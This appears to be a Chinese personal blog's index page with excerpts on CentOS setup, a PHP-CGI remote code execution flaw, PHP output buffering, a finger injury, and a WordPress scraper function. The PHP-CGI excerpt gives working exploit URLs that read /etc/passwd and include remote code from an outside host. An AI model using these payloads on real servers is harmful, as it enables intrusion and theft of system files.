一 关闭selinux
selinux对很多服务的要求以及安全策略非常多非常多,新手很难驾驭,所以一般建议关闭, 但在加固一些网络服务时,还是需要开启的
#disable selinux
sed -i '/SELINUX/s/enforcing/disabled/' /etc/selinux/config
二. 更换yum的更新源
如果服务器不是位于教育网内,中科大的镜像源速度也很一般啊, 强烈建议整合sohu或者163的更新源:
cd /etc/yum.repos.d
mv CentOS-Base.repo CentOS-Base.repo.save
wget http://mirrors.sohu.com/help/CentOS-Base-sohu.repo
mv CentOS-Base-sohu.repo CentOS-Base.repo
wget http://mirrors.163.com/.help/CentOS-Base-163.repo
wget http://mirrors.ustc.edu.cn/centos/CentOS-Base.5.mirrors.repo
yum makecache
阅读全文>>
又发现了一例PHP挂载CGI的环境下,远程执行任意代码的漏洞。
主要原因是:PHP做了防范,CGI在SAPI下无法使用-r,-f等直接执行命令的参数。
例子,
http://demo.com/do.php?-dauto_prepend_file%3d/etc/passwd+-n
http://demo.com/do.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://sjolzy.cn/a.txt
http://demo.com/do.php?-s
受影响的平台:APACHE+MOD_CGI+PHP-CGI模式。
阅读全文>>
PHP实时输出
04 May 2012 21:22 Friday by小屋 浏览(151)
老生长谈了。。纯备忘
对于运行时间较长的PHP程序来说可能都需要即时输出内容来查看运行情况。
header(“Content-type:text/html;charset=utf-8″);
#设置执行时间不限时
set_time_limit(0);
#清除并关闭缓冲,输出到浏览器之前使用这个函数。
ob_end_clean();
#控制隐式缓冲泻出,默认off,打开时,对每个 print/echo 或者输出命令的结果都发送到浏览器。
ob_implicit_flush(1);
例,
阅读全文>>
为右手小拇指写的一篇文章
02 May 2012 14:57 Wednesday by小屋 浏览(79)
"人呐, 一旦骚起来, 连骑车也GEEK"
这就是昨天下午想对自己说的一句话.
如果慢一点. 如果没有绕上去..如果NND右手刚好在扣鼻屎...
芥末会用手指头和钢管比硬 > _<!!!!
伤已成, 肉已掉, 血已流..
看着现在丰满雪白, 用纱布包得紧紧的小拇指,
我怀念以前她那一面的光滑.. 水亮水亮的
指甲, 给我一个指甲的时间,
然, 小手指头上钻肉刺骨的疼... 疼/ 在回答俺..
只望半年后指甲能重见巅峰 - -
WordPress的采集插件挺多, 功能也很强大。但是如果要折腾,还是自己写 :D
下面是我的采集插件里的几个关键函数:
匹配函数(经测试效率最好的一个)
/**
* 获取第一个匹配的内容
*
* @author Copyright (c) <http://sjolzy.cn>
* @param string $str 内容
* @param string $start 起始匹配
* @param string $end 中止匹配
* @return string
*/
private function strCut($str, $start, $end){
$content = strstr( $str, $start );
$content = substr( $content, strlen( $start ), strpos( $content, $end ) - strlen( $start ) );
return $content;
}
取出所有匹配的内容
/**
* 获取所有匹配的内容
阅读全文>>
